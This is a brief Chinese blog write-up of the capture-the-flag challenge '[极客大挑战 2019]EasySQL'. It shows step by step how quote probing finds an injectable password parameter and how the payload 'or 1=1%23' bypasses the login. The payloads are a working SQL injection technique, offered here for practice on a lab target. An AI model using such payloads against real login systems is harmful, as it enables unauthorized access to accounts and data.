[极客大挑战 2019]EasySQL
目录
[极客大挑战 2019]EasySQL
初始样子:
题目为EasySQL,猜测为sql注入题
用户名和密码随便数个1,提示账户密码错误,看URL发现是GET型
构造payload:?username=1&password=1"
,页面无影响
构造payload:?username=1&password=1'
,页面报错,说明password
处存在注入点
构造payload:?username=1&password=1'--+
,页面报错
构造payload:?username=1&password=1'%23
,页面正常(%23
为注释符#
的URL编码),说明是字符型
想要得到flag需要绕过这登录,使用万能钥匙or 1=1
会使得sql查询语句的where后面的语句直接为真
构造payload:?username=1&password=1'or 1=1%23
,绕过登录,得到flag
当我站在传授他人的角度思考问题时
才能真正领悟并融会贯通
博客受益者是未来那个遗忘某个技术的自己